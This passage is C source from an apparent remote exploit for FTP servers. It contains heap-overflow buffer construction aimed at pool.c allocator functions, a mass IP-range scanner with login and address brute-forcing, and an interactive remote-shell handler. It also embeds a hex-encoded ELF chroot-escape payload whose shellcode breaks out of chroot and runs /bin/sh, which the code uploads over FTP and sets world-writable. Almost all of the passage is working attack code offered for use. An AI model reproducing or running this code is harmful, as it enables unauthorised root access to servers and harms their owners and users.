*(unsigned int *)(buf+28)=dummy;
// this will become the address of an available chunk of memory
// that is returned by new_block() in pool.c
*(unsigned int *)(buf+32)=writeaddr;
// this is what will be returned by palloc() in pool.c
// palloc() is the function that calls new_block() and
// provides the allocation interface for the pools system.
*(unsigned int *)(buf+36)=writeaddr;
memcpy(exploitBuf+exploitBufLen,buf,40);
exploitBufLen+=40;
dummy++;
}
return SUCCESS;
}
int create_passive_server()
{
struct sockaddr_in serverAddr;
int on=1,sock;
status_bar("Creating server");
sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&serverAddr,0,sizeof(struct sockaddr_in));
serverAddr.sin_port=htons(currentPassivePort);
serverAddr.sin_family=AF_INET;
serverAddr.sin_addr.s_addr=htonl(INADDR_ANY);
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
if(bind(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
close(sock);
return FAILURE;
}
if(listen(sock,5)<0) {
close(sock);
return FAILURE;
}
return sock;
}
void usage(char *exploitName)
{
printf("Usage: %s -s <start ip> -e <end ip> [options]\n",exploitName);
printf("Important arguments:\n");
printf(" -l <local ip address> interface to bind to\n");
printf(" -U <path> - specify upload path, eg. \"incoming\"\n");
printf(" -c <count> - count of connections for ip-range scan [30]\n");
printf(" -t <seconds> - timeout for each connection [3]\n");
printf(" -u <username>\n");
printf(" -p <password>\n");
printf(" Dont use \"-u\" and \"-p\" options if u dont know login/password.\n");
printf(" Exploit will try to bruteforce it.\nOther (bonus) arguments:\n");
printf(" -v - be more verbose\n");
printf(" -n - don't beleave FTP banner (try to exploit every ftpd) - hmm..\n");
printf(" -P <port> - port to scan [21]\n");
printf(" -S <address> - start at <address> when bruteforcing [0x%x]\n\n",STACK_START);
exit(0);
}
int do_remote_shell(int shellSock)
{
fd_set rfds;
char buf[1024];
int retval, r=1;
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(shellSock, &rfds);
retval=select(shellSock+1, &rfds, NULL, NULL, NULL);
if(retval) {
if(FD_ISSET(shellSock, &rfds)) {
buf[(r=recv(shellSock, buf, sizeof(buf)-1,0))]='\0'; // lol
printf("%s", buf);fflush(stdout);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, sizeof(buf)-1))]='\0'; // lmfao
send(shellSock, buf, strlen(buf), 0);
}
}
} while(retval && r); // loop until connection terminates
return SUCCESS;
}
int check_for_linefeed()
{
char *ptr=(char *)&stackWriteAddr;
int i=4;
for(;i;i--)
if(*(ptr++)=='\n')
return FAILURE;
return SUCCESS;
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
my_sleep(SLEEP_DELAY);
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
my_sleep(SLEEP_DELAY);
memset(serverBuf, 0, SIZE);
len=recv(s, serverBuf, SIZE-1, 0);
serverBuf[len]=0;
}
int doris_chroot_breaker() {
char haggis_magic_buffer[]=
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00"
"\xa0\x01\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00"
"\x09\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
"\x00\x80\x04\x08\x20\x01\x00\x00\x20\x01\x00\x00\x05\x00\x00\x00"
"\x00\x10\x00\x00\x01\x00\x00\x00\x20\x01\x00\x00\x20\x91\x04\x08"
"\x20\x91\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00"
"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x55\x89\xe5\x83\xec\x6c\x57\x56\x53\x8d\x45\xa0\x8d\x7d\xa0\xbe"
"\xc0\x80\x04\x08\xfc\xb9\x17\x00\x00\x00\xf3\xa5\x66\xa5\xa4\x8d"
"\x45\xa0\x89\x45\x9c\x8b\x5d\x9c\xff\xd3\x8d\x65\x88\x5b\x5e\x5f"
"\x89\xec\x5d\xc3\x8d\xb6\x00\x00\x00\x00\x8d\xbf\x00\x00\x00\x00"
"\x31\xc0\x31\xdb\x40\x50\x89\xe1\x66\xbb\x73\x68\x53\x89\xe3\xb0"
"\x27\xcd\x80\x31\xc0\x89\xe3\xb0\x3d\xcd\x80\x31\xc9\xb1\x0a\x31"
"\xc0\x31\xdb\x66\xbb\x2e\x2e\x53\x89\xe3\xb0\x0c\xcd\x80\x49\x85"
"\xc9\x75\xec\x31\xc0\x31\xdb\xb3\x2e\x53\x89\xe3\xb0\x3d\xcd\x80"
"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x00\x00"
"\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x32\x2e\x39\x35"
"\x2e\x33\x20\x32\x30\x30\x31\x30\x33\x31\x35\x20\x28\x53\x75\x53"
"\x45\x29\x00\x08\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x30"
"\x31\x2e\x30\x31\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00"
"\x2e\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61"
"\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00"
"\x2e\x64\x61\x74\x61\x00\x2e\x73\x62\x73\x73\x00\x2e\x62\x73\x73"
"\x00\x2e\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x2e\x6e\x6f\x74\x65\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x01\x00\x00\x00"
"\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x40\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
"\x21\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\xc0\x80\x04\x08"
"\xc0\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x00\x00\x00\x00\x00\x00\x00\x29\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
"\x2f\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x20\x91\x04\x08"
"\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x08\x00\x00\x00"
"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
"\x3a\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x01\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x07\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x01\x00\x00\x14\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x01\x00\x00\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00";
strcpy(filename, "aa");
memset(exploitBuf,0,777);
memcpy(exploitBuf, haggis_magic_buffer, 776);
exploitBufLen=776;
if((controlSock=connect_to_server(ftpPort))==FAILURE) {
printf("[-] Could not connect to target server\n");
return 1;
}
login_to_server();
my_send(controlSock, "MKD incoming\r\n");
my_recv(controlSock);
my_send(controlSock, "SITE CHMOD 777 incoming\r\n");
my_recv(controlSock);
my_send(controlSock, "CWD incoming\r\n");
my_recv(controlSock);
set_passive_mode(UPLOAD);
upload_file();
my_send(controlSock, "SITE CHMOD 777 aa\r\n");
close(controlSock);
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
struct timespec t;
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
void surprise()
{
if (run) {
for(i=0;i<count;i++)
{
if(s[i].state != CLSD){
fcntl(s[i].s,F_SETFL,O_RDWR);
close(s[i].s);
}
}
}
printf("\n[~] Exiting...\n");
exit(0);
return;
}
# eof
